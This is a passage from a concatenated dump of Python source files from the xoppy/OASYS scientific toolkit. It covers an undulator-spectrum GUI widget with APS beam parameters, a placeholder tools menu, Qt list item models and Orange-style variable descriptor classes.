"xus"] outputs = [{"name": "xoppy_data", "type": np.ndarray, "doc": ""}, {"name": "xoppy_specfile", "type": str, "doc": ""}] #inputs = [{"name": "Name", # "type": type, # "handler": None, # "doc": ""}] want_main_area = False TITLE = Setting("APS Undulator A, Beam Parameters for regular lattice nux36nuy39.twi, 1.5% cpl.") ENERGY = Setting(7.0) CUR = Setting(100.0) SIGE = Setting(0.000959999975748) TEXT_MACHINE = Setting("") SIGX = Setting(0.273999989032745) SIGY = Setting(0.010999999940395) SIGX1 = Setting(0.011300000362098) SIGY1 = Setting(0.00359999993816) TEXT_BEAM = Setting("") PERIOD = Setting(3.299999952316284) NP = Setting(70) KX = Setting(0.0) KY = Setting(2.75) TEXT_UNDULATOR = Setting("") EMIN = Setting(1000.0) EMAX = Setting(50000.0) N = Setting(5000) TEXT_ENERGY = Setting("") D = Setting(30.0) XPC = Setting(0.0) YPC = Setting(0.0) XPS = Setting(2.5) YPS = Setting(1.0) NXP = Setting(25) NYP = Setting(10) TEXT_PINHOLE = Setting("") MODE = Setting(2) METHOD = Setting(4) IHARM = Setting(0) TEXT_MODE = Setting("") NPHI = Setting(0) NALPHA = Setting(0) CALPHA2 = Setting(0.0) NOMEGA = Setting(64) COMEGA = Setting(8.0) NSIGMA = Setting(0) TEXT_CALC = Setting("") RUN_MODE_NAME = Setting("foreground") def __init__(self): super().__init__() box0 = gui.widgetBox(self.controlArea, " ",orientation="horizontal") #widget buttons: compute, set defaults, help gui.button(box0, self, "Compute", callback=self.compute) gui.button(box0, self, "Defaults", callback=self.defaults) gui.button(box0, self, "Help", callback=self.help1) self.process_showers() box = gui.widgetBox(self.controlArea, " ",orientation="vertical") idx = -1 #widget index 0 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TITLE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "ENERGY", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 2 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "CUR", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 3 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGE", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 4 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_MACHINE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 5 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGX", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 6 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGY", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 7 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGX1", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 8 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGY1", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 9 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_BEAM", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 10 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "PERIOD", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 11 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NP", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 12 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "KX", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 13 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "KY", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 14 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_UNDULATOR", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 15 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "EMIN", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 16 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "EMAX", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 17 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "N", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 18 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_ENERGY", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 19 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "D", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 20 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "XPC", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 21 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "YPC", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 22 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "XPS", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 23 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "YPS", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 24 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NXP", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 25 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NYP", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 26 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_PINHOLE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 27 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "MODE", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 28 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "METHOD", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 29 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "IHARM", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 30 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_MODE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 31 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NPHI", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 32 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NALPHA", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 33 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "CALPHA2", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 34 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NOMEGA", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 35 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "COMEGA", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 36 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NSIGMA", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 37 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_CALC", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 38 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "RUN_MODE_NAME", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) gui.rubber(self.controlArea) def unitLabels(self): return ['Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title'] def unitFlags(self): return ['True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True'] #def unitNames(self): # return ['TITLE','ENERGY','CUR','SIGE','TEXT_MACHINE','SIGX','SIGY','SIGX1','SIGY1','TEXT_BEAM','PERIOD','NP','KX','KY','TEXT_UNDULATOR','EMIN','EMAX','N','TEXT_ENERGY','D','XPC','YPC','XPS','YPS','NXP','NYP','TEXT_PINHOLE','MODE','METHOD','IHARM','TEXT_MODE','NPHI','NALPHA','CALPHA2','NOMEGA','COMEGA','NSIGMA','TEXT_CALC','RUN_MODE_NAME'] def compute(self): fileName = xoppy_calc_xus(TITLE=self.TITLE,ENERGY=self.ENERGY,CUR=self.CUR,SIGE=self.SIGE,TEXT_MACHINE=self.TEXT_MACHINE,SIGX=self.SIGX,SIGY=self.SIGY,SIGX1=self.SIGX1,SIGY1=self.SIGY1,TEXT_BEAM=self.TEXT_BEAM,PERIOD=self.PERIOD,NP=self.NP,KX=self.KX,KY=self.KY,TEXT_UNDULATOR=self.TEXT_UNDULATOR,EMIN=self.EMIN,EMAX=self.EMAX,N=self.N,TEXT_ENERGY=self.TEXT_ENERGY,D=self.D,XPC=self.XPC,YPC=self.YPC,XPS=self.XPS,YPS=self.YPS,NXP=self.NXP,NYP=self.NYP,TEXT_PINHOLE=self.TEXT_PINHOLE,MODE=self.MODE,METHOD=self.METHOD,IHARM=self.IHARM,TEXT_MODE=self.TEXT_MODE,NPHI=self.NPHI,NALPHA=self.NALPHA,CALPHA2=self.CALPHA2,NOMEGA=self.NOMEGA,COMEGA=self.COMEGA,NSIGMA=self.NSIGMA,TEXT_CALC=self.TEXT_CALC,RUN_MODE_NAME=self.RUN_MODE_NAME) #send specfile if fileName == None: print("Nothing to send") else: self.send("xoppy_specfile",fileName) sf = specfile.Specfile(fileName) if sf.scanno() == 1: #load spec file with one scan, # is comment print("Loading file: ",fileName) out = np.loadtxt(fileName) print("data shape: ",out.shape) #get labels txt = open(fileName).readlines() tmp = [ line.find("#L") for line in txt] itmp = np.where(np.array(tmp) != (-1)) labels = txt[itmp[0]].replace("#L ","").split(" ") print("data labels: ",labels) self.send("xoppy_data",out) else: print("File %s contains %d scans. Cannot send it as xoppy_table"%(fileName,sf.scanno())) def defaults(self): self.resetSettings() self.compute() return def help1(self): print("help pressed.") xoppy_doc('xus') if __name__ == "__main__": app = QApplication(sys.argv) w = OWxus() w.show() app.exec() w.saveSettings() ``` #### File: xoppy/menu/xoppy_tools_menu.py ```python from PyQt5 import QtWidgets from oasys.menus.menu import OMenu class XoppyToolsMenu(OMenu): def __init__(self): super().__init__(name="Xoppy Tools") self.addSubMenu("Xoppy Tool 1") self.addSubMenu("Xoppy Tool 2") self.addSeparator() self.addSubMenu("Xoppy Tool 3") def executeAction_1(self, action): self.showWarningMessage("Xoppy Tool 1") def executeAction_2(self, action): self.showWarningMessage("Xoppy Tool 2") def executeAction_3(self, action): self.showWarningMessage("Xoppy Tool 3") def showConfirmMessage(self, message): msgBox = QtWidgets.QMessageBox() msgBox.setIcon(QtWidgets.QMessageBox.Question) msgBox.setText(message) msgBox.setInformativeText( "Element will be omitted.\nDo you want to continue importing procedure (a broken link will appear)?") msgBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No) msgBox.setDefaultButton(QtWidgets.QMessageBox.No) ret = msgBox.exec_() return ret def showWarningMessage(self, message): msgBox = QtWidgets.QMessageBox() msgBox.setIcon(QtWidgets.QMessageBox.Warning) msgBox.setText(message) msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok) msgBox.exec_() def showCriticalMessage(self, message): msgBox = QtWidgets.QMessageBox() msgBox.setIcon(QtWidgets.QMessageBox.Critical) msgBox.setText(message) msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok) msgBox.exec_() ``` #### File: util/script/itemmodels.py ```python import pickle from contextlib import contextmanager from PyQt5.QtCore import Qt, QAbstractListModel, QModelIndex, QByteArray, QItemSelectionModel from PyQt5.QtCore import pyqtSignal as Signal from PyQt5.QtWidgets import ( QWidget, QBoxLayout, QToolButton, QAbstractButton, QAction ) from orangecontrib.xoppy.util.script.variable import ( Variable, DiscreteVariable, ContinuousVariable, StringVariable ) from orangewidget import gui class _store(dict): pass def _argsort(seq, cmp=None, key=None, reverse=False): if key is not None: items = sorted(enumerate(seq), key=lambda i, v: key(v)) elif cmp is not None: items = sorted(enumerate(seq), cmp=lambda a, b: cmp(a[1], b[1])) else: items = sorted(enumerate(seq), key=seq.__getitem__) if reverse: items = reversed(items) return items @contextmanager def signal_blocking(obj): blocked = obj.signalsBlocked() obj.blockSignals(True) yield obj.blockSignals(blocked) def _as_contiguous_range(start, stop, step): if step == -1: # Equivalent range with positive step start, stop = stop + 1, start + 1 elif not (step == 1 or step is None): raise IndexError("Non-contiguous range.") return start, stop, step class PyListModel(QAbstractListModel): """ A model for displaying python list like objects in Qt item view classes """ MIME_TYPES = ["application/x-Orange-PyListModelData"] def __init__(self, iterable=None, parent=None, flags=Qt.ItemIsSelectable | Qt.ItemIsEnabled, list_item_role=Qt.DisplayRole, supportedDropActions=Qt.MoveAction): super().__init__(parent) self._list = [] self._other_data = [] self._flags = flags self.list_item_role = list_item_role self._supportedDropActions = supportedDropActions if iterable is not None: self.extend(iterable) def _is_index_valid_for(self, index, list_like): if isinstance(index, QModelIndex) and index.isValid(): row, column = index.row(), index.column() return 0 <= row < len(list_like) and not column elif isinstance(index, int): return -len(self) < index < len(list_like) else: return False def wrap(self, lst): """ Wrap the list with this model. All changes to the model are done in place on the passed list """ self._list = lst self._other_data = [_store() for _ in lst] self.reset() # noinspection PyMethodOverriding def index(self, row, column=0, parent=QModelIndex()): if self._is_index_valid_for(row, self) and column == 0: return QAbstractListModel.createIndex(self, row, column, parent) else: return QModelIndex() def headerData(self, section, orientation, role=Qt.DisplayRole): if role == Qt.DisplayRole: return str(section) # noinspection PyMethodOverriding def rowCount(self, parent=QModelIndex()): return 0 if parent.isValid() else len(self) def columnCount(self, parent=QModelIndex()): return 0 if parent.isValid() else 1 def data(self, index, role=Qt.DisplayRole): row = index.row() if role in [self.list_item_role, Qt.EditRole] \ and self._is_index_valid_for(index, self): return self[row] elif self._is_index_valid_for(row, self._other_data): return self._other_data[row].get(role, None) def itemData(self, index): mapping = QAbstractListModel.itemData(self, index) if self._is_index_valid_for(index, self._other_data): items = list(self._other_data[index.row()].items()) else: items = [] for key, value in items: mapping[key] = value return mapping def parent(self, index=QModelIndex()): return QModelIndex() def setData(self, index, value, role=Qt.EditRole): if role == Qt.EditRole and self._is_index_valid_for(index, self): self[index.row()] = value # Will emit proper dataChanged signal return True elif self._is_index_valid_for(index, self._other_data): self._other_data[index.row()][role] = value self.dataChanged.emit(index, index) return True else: return False def setItemData(self, index, data): data = dict(data) with signal_blocking(self): for role, value in data.items(): if role == Qt.EditRole and \ self._is_index_valid_for(index, self): self[index.row()] = value elif self._is_index_valid_for(index, self._other_data): self._other_data[index.row()][role] = value self.dataChanged.emit(index, index) return True def flags(self, index): if self._is_index_valid_for(index, self._other_data): return self._other_data[index.row()].get("flags", self._flags) else: return self._flags | Qt.ItemIsDropEnabled # noinspection PyMethodOverriding def insertRows(self, row, count, parent=QModelIndex()): """ Insert ``count`` rows at ``row``, the list fill be filled with ``None`` """ if not parent.isValid(): self[row:row] = [None] * count return True else: return False # noinspection PyMethodOverriding def removeRows(self, row, count, parent=QModelIndex()): """Remove ``count`` rows starting at ``row`` """ if not parent.isValid(): del self[row:row + count] return True else: return False def extend(self, iterable): list_ = list(iterable) self.beginInsertRows(QModelIndex(), len(self), len(self) + len(list_) - 1) self._list.extend(list_) self._other_data.extend([_store() for _ in list_]) self.endInsertRows() def append(self, item): self.extend([item]) def insert(self, i, val): self.beginInsertRows(QModelIndex(), i, i) self._list.insert(i, val) self._other_data.insert(i, _store()) self.endInsertRows() def remove(self, val): i = self._list.index(val) self.__delitem__(i) def pop(self, i): item = self._list[i] self.__delitem__(i) return item def __len__(self): return len(self._list) def __iter__(self): return iter(self._list) def __getitem__(self, i): return self._list[i] def __add__(self, iterable): new_list = PyListModel(list(self._list), self.parent(), flags=self._flags, list_item_role=self.list_item_role, supportedDropActions=self.supportedDropActions() ) new_list._other_data = list(self._other_data) new_list.extend(iterable) return new_list def __iadd__(self, iterable): self.extend(iterable) def __delitem__(self, s): if isinstance(s, slice): start, stop, step = s.indices(len(self)) start, stop, step = _as_contiguous_range(start, stop, step) self.beginRemoveRows(QModelIndex(), start, stop - 1) else: s = len(self) + s if s < 0 else s self.beginRemoveRows(QModelIndex(), s, s) del self._list[s] del self._other_data[s] self.endRemoveRows() def __setitem__(self, s, value): if isinstance(s, slice): start, stop, step = s.indices(len(self)) start, stop, step = _as_contiguous_range(start, stop, step) self.__delitem__(slice(start, stop, step)) if not isinstance(value, list): value = list(value) self.beginInsertRows(QModelIndex(), start, start + len(value) - 1) self._list[s] = value self._other_data[s] = (_store() for _ in value) self.endInsertRows() else: s = len(self) + s if s < 0 else s self._list[s] = value self._other_data[s] = _store() self.dataChanged.emit(self.index(s), self.index(s)) def reverse(self): self._list.reverse() self._other_data.reverse() self.dataChanged.emit(self.index(0), self.index(len(self) - 1)) def sort(self, *args, **kwargs): indices = _argsort(self._list, *args, **kwargs) lst = [self._list[i] for i in indices] other = [self._other_data[i] for i in indices] for i, new_l, new_o in enumerate(zip(lst, other)): self._list[i] = new_l self._other_data[i] = new_o self.dataChanged.emit(self.index(0), self.index(len(self) - 1)) def __repr__(self): return "PyListModel(%s)" % repr(self._list) def __bool__(self): return len(self) != 0 def emitDataChanged(self, indexList): if isinstance(indexList, int): indexList = [indexList] #TODO: group indexes into ranges for ind in indexList: self.dataChanged.emit(self.index(ind), self.index(ind)) ########### # Drag/drop ########### def supportedDropActions(self): return self._supportedDropActions def mimeTypes(self): return self.MIME_TYPES + list(QAbstractListModel.mimeTypes(self)) def mimeData(self, indexlist): if len(indexlist) <= 0: return None items = [self[i.row()] for i in indexlist] mime = QAbstractListModel.mimeData(self, indexlist) data = pickle.dumps(vars) mime.set_data(self.MIME_TYPE, QByteArray(data)) mime._items = items return mime def dropMimeData(self, mime, action, row, column, parent): if action == Qt.IgnoreAction: return True if not mime.hasFormat(self.MIME_TYPE): return False if hasattr(mime, "_vars"): vars_ = mime._vars else: desc = str(mime.data(self.MIME_TYPE)) vars_ = pickle.loads(desc) return QAbstractListModel.dropMimeData( self, mime, action, row, column, parent) class VariableListModel(PyListModel): MIME_TYPE = "application/x-Orange-VariableList" def data(self, index, role=Qt.DisplayRole): if self._is_index_valid_for(index, self): var = self[index.row()] if not isinstance(var, Variable): return super().data(index, role) elif role == Qt.DisplayRole: return var.name elif role == Qt.DecorationRole: return gui.attributeIconDict[var] elif role == Qt.ToolTipRole: return self.variable_tooltip(var) else: return PyListModel.data(self, index, role) def variable_tooltip(self, var): if isinstance(var, DiscreteVariable): return self.discrete_variable_tooltip(var) elif isinstance(var, ContinuousVariable): return self.continuous_variable_toltip(var) elif isinstance(var, StringVariable): return self.string_variable_tooltip(var) def variable_labels_tooltip(self, var): text = "" if var.attributes: items = [(safe_text(key), safe_text(value)) for key, value in var.attributes.items()] labels = list(map("%s = %s".__mod__, items)) text += "<br/>Variable Labels:<br/>" text += "<br/>".join(labels) return text def discrete_variable_tooltip(self, var): text = "<b>%s</b><br/>Discrete with %i values: " %\ (safe_text(var.name), len(var.values)) text += ", ".join("%r" % safe_text(v) for v in var.values) text += self.variable_labels_tooltip(var) return text def continuous_variable_toltip(self, var): text = "<b>%s</b><br/>Continuous" % safe_text(var.name) text += self.variable_labels_tooltip(var) return text def string_variable_tooltip(self, var): text = "<b>%s</b><br/>String" % safe_text(var.name) text += self.variable_labels_tooltip(var) return text def python_variable_tooltip(self, var): text = "<b>%s</b><br/>Python" % safe_text(var.name) text += self.variable_labels_tooltip(var) return text _html_replace = [("<", "&lt;"), (">", "&gt;")] def safe_text(text): for old, new in _html_replace: text = text.replace(old, new) return text class ListSingleSelectionModel(QItemSelectionModel): """ Item selection model for list item models with single selection. Defines signal: - selectedIndexChanged(QModelIndex) """ selectedIndexChanged = Signal(QModelIndex) def __init__(self, model, parent=None): QItemSelectionModel.__init__(self, model, parent) self.selectionChanged.connect(self.onSelectionChanged) def onSelectionChanged(self, new, _): index = list(new.indexes()) if index: index = index.pop() else: index = QModelIndex() self.selectedIndexChanged.emit(index) def selectedRow(self): """ Return QModelIndex of the selected row or invalid if no selection. """ rows = self.selectedRows() if rows: return rows[0] else: return QModelIndex() def select(self, index, flags=QItemSelectionModel.ClearAndSelect): if isinstance(index, int): index = self.model().index(index) return QItemSelectionModel.select(self, index, flags) def select_row(view, row): """ Select a `row` in an item view. """ selmodel = view.selectionModel() selmodel.select(view.model().index(row, 0), QItemSelectionModel.ClearAndSelect | QItemSelectionModel.Rows) class ModelActionsWidget(QWidget): def __init__(self, actions=None, parent=None, direction=QBoxLayout.LeftToRight): QWidget.__init__(self, parent) self.actions = [] self.buttons = [] layout = QBoxLayout(direction) layout.setContentsMargins(0, 0, 0, 0) self.setContentsMargins(0, 0, 0, 0) self.setLayout(layout) if actions is not None: for action in actions: self.addAction(action) self.setLayout(layout) def actionButton(self, action): if isinstance(action, QAction): button = QToolButton(self) button.setDefaultAction(action) return button elif isinstance(action, QAbstractButton): return action def insertAction(self, ind, action, *args): button = self.actionButton(action) self.layout().insertWidget(ind, button, *args) self.buttons.insert(ind, button) self.actions.insert(ind, action) return button def addAction(self, action, *args): return self.insertAction(-1, action, *args) ``` #### File: util/script/variable.py ```python from math import isnan, floor from numbers import Real from orangecontrib.shadow.util.script.value import Value, Unknown import collections ValueUnknown = Unknown # Shadowing within classes class Variable: """ The base class for variable descriptors contains the variable's name and some basic properties. .. attribute:: name The name of the variable. .. attribute:: unknown_str A set of values that represent unknowns in conversion from textual formats. Default is `{"?", ".", "", "NA", "~", None}`. .. attribute:: compute_value A function for computing the variable's value when converting from another domain which does not contain this variable. The base class defines a static method `compute_value`, which returns `Unknown`. Non-primitive variables must redefine it to return `None`. .. attribute:: source_variable An optional descriptor of the source variable - if any - from which this variable is derived and computed via :obj:`compute_value`. .. attribute:: attributes A dictionary with user-defined attributes of the variable """ _DefaultUnknownStr = {"?", ".", "", "NA", "~", None} _variable_types = [] Unknown = ValueUnknown def __init__(self, name="", compute_value=None): """ Construct a variable descriptor. """ self.name = name if compute_value is not None: self.compute_value = compute_value self.unknown_str = set(Variable._DefaultUnknownStr) self.source_variable = None self.attributes = {} @staticmethod def is_primitive(): """ `True` if the variable's values are stored as floats. Primitive variables are :obj:`~data.DiscreteVariable` and :obj:`~data.ContinuousVariable`. Non-primitive variables can appear in the data only as meta attributes. Derived classes must overload the function. """ raise RuntimeError("variable descriptors must overload is_primitive()") def repr_val(self, val): """ Return a textual representation of variable's value `val`. Argument `val` must be a float (for primitive variables) or an arbitrary Python object (for non-primitives). Derived classes must overload the function. """ raise RuntimeError("variable descriptors must overload repr_val()") str_val = repr_val def to_val(self, s): """ Convert the given argument to a value of the variable. The argument can be a string, a number or `None`. For primitive variables, the base class provides a method that returns :obj:`~Orange.data.value.Unknown` if `s` is found in :obj:`~Orange.data.Variable.unknown_str`, and raises an exception otherwise. For non-primitive variables it returns the argument itself. Derived classes of primitive variables must overload the function. :param s: value, represented as a number, string or `None` :type s: str, float or None :rtype: float or object """ if not self.is_primitive(): return s if s in self.unknown_str: return Unknown raise RuntimeError( "primitive variable descriptors must overload to_val()") def val_from_str_add(self, s): """ Convert the given string to a value of the variable. The method is similar to :obj:`to_val` except that it only accepts strings and that it adds new values to the variable's domain where applicable. The base class method calls `to_val`. :param s: symbolic representation of the value :type s: str :rtype: float or object """ return self.to_val(s) def __str__(self): """ Return a representation of the variable, like, `'DiscreteVariable("gender")'`. Derived classes may overload this method to provide a more informative representation. """ return "{}('{}')".format(self.__class__.__name__, self.name) __repr__ = __str__ @staticmethod def compute_value(_): return Unknown @classmethod def _clear_cache(cls): for tpe in cls._variable_types: tpe._clear_cache() class ContinuousVariable(Variable): """ Descriptor for continuous variables. .. attribute:: number_of_decimals The number of decimals when the value is printed out (default: 3). .. attribute:: adjust_decimals A flag regulating whether the `number_of_decimals` is being adjusted by :obj:`to_val`. The value of `number_of_decimals` is set to 3 and `adjust_decimals` is set to 2. When :obj:`val_from_str_add` is called for the first time with a string as an argument, `number_of_decimals` is set to the number of decimals in the string and `adjust_decimals` is set to 1. In the subsequent calls of `to_val`, the nubmer of decimals is increased if the string argument has a larger number of decimals. If the `number_of_decimals` is set manually, `adjust_decimals` is set to 0 to prevent changes by `to_val`. """ all_continuous_vars = {} def __init__(self, name="", number_of_decimals=None): """ Construct a new continuous variable. The number of decimals is set to three, but adjusted at the first call of :obj:`to_val`. """ super().__init__(name) if number_of_decimals is None: self.number_of_decimals = 3 self.adjust_decimals = 2 else: self.number_of_decimals = number_of_decimals ContinuousVariable.all_continuous_vars[name] = self @property def number_of_decimals(self): return self._number_of_decimals # noinspection PyAttributeOutsideInit @number_of_decimals.setter def number_of_decimals(self, x): self._number_of_decimals = x self.adjust_decimals = 0 self._out_format = "%.{}f".format(self.number_of_decimals) @staticmethod def make(name): """ Return an existing continuous variable with the given name, or construct and return a new one. """ existing_var = ContinuousVariable.all_continuous_vars.get(name) return existing_var or ContinuousVariable(name) @classmethod def _clear_cache(cls): """ Clears the list of variables for reuse by :obj:`make`. """ cls.all_continuous_vars.clear() @staticmethod def is_primitive(): """ Return `True`: continuous variables are stored as floats.""" return True def to_val(self, s): """ Convert a value, given as an instance of an arbitrary type, to a float. """ if s in self.unknown_str: return Unknown return float(s) def val_from_str_add(self, s): """ Convert a value from a string and adjust the number of decimals if `adjust_decimals` is non-zero. """ if s in self.unknown_str: return Unknown val = float(s) # raise exception before setting the number of decimals if self.adjust_decimals and isinstance(s, str): #TODO: This may significantly slow down file reading. # Is there something we can do about it? s = s.strip() i = s.find(".") ndec = len(s) - i - 1 if i > 0 else 0 if self.adjust_decimals == 2: self.number_of_decimals = ndec elif ndec > self.number_of_decimals: self.number_of_decimals = ndec self.adjust_decimals = 1 return val def repr_val(self, val): """ Return the value as a string with the prescribed number of decimals. """ if isnan(val): return "?" return self._out_format % val str_val = repr_val class DiscreteVariable(Variable): """ Descriptor for symbolic, discrete variables. Values of discrete variables are stored as floats; the numbers corresponds to indices in the list of values. .. attribute:: values A list of variable's values. .. attribute:: ordered Some algorithms (and, in particular, visualizations) may sometime reorder the values of the variable, e.g. alphabetically. This flag hints that the given order of values is "natural" (e.g. "small", "middle", "large") and should not be changed. .. attribute:: base_value The index of the base value, or -1 if there is none. The base value is used in some methods like, for instance, when creating dummy variables for regression. """ all_discrete_vars = collections.defaultdict(set) presorted_values = [] def __init__(self, name="", values=(), ordered=False, base_value=-1): """ Construct a discrete variable descriptor with the given values. """ super().__init__(name) self.ordered = ordered self.values = list(values) self.base_value = base_value DiscreteVariable.all_discrete_vars[name].add(self) def __str__(self): """ Give a string representation of the variable, for instance, `"DiscreteVariable('Gender', values=['male', 'female'])"`. """ args = "values=[" + ", ".join(self.values[:5]) +\ "..." * (len(self.values) > 5) + "]" if self.ordered: args += ", ordered=True" if self.base_value >= 0: args += ", base_value={}".format(self.base_value) return 